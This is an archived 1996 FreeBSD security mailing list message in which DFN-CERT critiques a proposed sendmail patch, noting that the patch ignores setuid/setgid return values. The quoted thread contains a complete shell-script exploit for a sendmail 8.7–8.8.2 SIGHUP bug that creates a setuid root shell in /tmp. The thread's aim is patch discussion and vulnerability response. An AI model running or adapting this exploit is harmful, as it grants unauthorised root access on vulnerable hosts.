From owner-freebsd-security Sat Nov 16 11:47:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA15202 for security-outgoing; Sat, 16 Nov 1996 11:47:58 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA15194; Sat, 16 Nov 1996 11:47:50 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.2/8.8.2) with ESMTP id UAA14556; Sat, 16 Nov 1996 20:49:00 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.2/8.8.2) id UAA09254; Sat, 16 Nov 1996 20:48:59 +0100 (MET) Message-Id: <199611161948.UAA09254@tiger.cert.dfn.de> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: cschuber@uumail.gov.bc.ca Date: Sat, 16 Nov 1996 20:48:58 +0100 (MET) Cc: security-officer@FreeBSD.org, freebsd-security@FreeBSD.org In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> from "Cy Schubert" at Nov 16, 96 11:27:28 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Cy Schubert wrote: > > This appears to be a better fix, and it works too. May work... Why do people ignore return values? Especially of such important calls like setgid() and setuid()? *bad* idea... By the way: Eric Allman has produced a much better fix. I expect it to be public available very shortly. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." > > ------- Forwarded Message > > Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) > X-UIDL: 848169128.001 > Resent-From: Cy Schubert - ITSD Open Systems Group > Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> > Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) > Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) > id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 > Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) > Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 > Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 > Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 > X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs > Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) > From: Curt Sampson > X-Sender: cjs@didactic > To: Leshka Zakharoff > Cc: best-of-security@suburbia.net > In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> > Message-Id: > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Approved: proff@suburbia.net > Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> > Prev-Resent-From: best-of-security@suburbia.net > X-Mailing-List: archive/latest/509 > X-Loop: best-of-security@suburbia.net > Precedence: list > Prev-Resent-Sender: best-of-security-request@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-To: cy@uumail.gov.bc.ca > Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 > Resent-XMts: smtp > > > Huh. Yet another gaping hole, can you believe it? This is entirely > platform-independent, and has not yet been fixed in 8.2.2. Here's > the patch to fix it. This was done on 8.7.6; the line numbers may > differ in other versions but the patch is the same. > > - ------------------------------------------------------ > - --- main.c.old Mon Sep 16 12:56:01 1996 > +++ main.c Fri Nov 15 23:56:48 1996 > @@ -1693,14 +1693,16 @@ > sighup() > { > #ifdef LOG > if (LogLevel > 3) > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + (void) setgid(RealGid); > + (void) setuid(RealUid); > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); > #endif > exit(EX_OSFILE); > } > - ------------------------------------------------------ > > Now who the heck to I send this to to get it back into sendmail? There > are no e-mail addresses listed for bug reports in the READ_ME file, or > anywhere else for that matter. > > cjs > > Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ > Internet Portal Services, Inc. > Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. > > On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > > > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) > > From: Leshka Zakharoff > > To: best-of-security@suburbia.net > > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > > Resent-From: best-of-security@suburbia.net > > > > #-------------------------------- CUT HERE ------------------------------------- > > #/bin/sh > > # > > # > > # Hi ! > > # This is exploit for sendmail smtpd bug > > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > > # This shell script does a root shell in /tmp directory. > > # If you have any problems with it, drop me a letter. > > # Have fun ! > > # > > # > > # ---------------------- > > # --------------------------------------------- > > # ----------------- Dedicated to my beautiful lady ------------------ > > # --------------------------------------------- > > # ---------------------- > > # > > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > > # > > # > > # > > echo 'main() '>>leshka.c > > echo '{ '>>leshka.c > > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > > echo '} '>>leshka.c > > # > > # > > echo 'main() '>>smtpd.c > > echo '{ '>>smtpd.c > > echo ' setuid(0); setgid(0); '>>smtpd.c > > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > > echo '} '>>smtpd.c > > # > > # > > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > > ./leshka > > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > > rm leshka.c leshka smtpd.c /tmp/smtpd > > /tmp/sh > > #-------------------------------- CUT HERE ------------------------------------- > > > > > > > > ------- End of Forwarded Message > > -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo4aqAQmfXmOCknRAQHtpgP/WqCBZh95dD2yKsy9v2bv65aH8qULXNOl pFq2UYuquVxtx9NOqxROtD+nlE6Sr1PfHtQz2wunUk1LDeSFb7KhJjmuu2HtnCVd q7j3rA7hDJiXuZlqXyKWMhzxShph8cn4hxYO+by9NqEyn/eGU1veGzsJFfW+Zla/ +5Qa4S7jWIs= =0CXZ -----END PGP SIGNATURE-----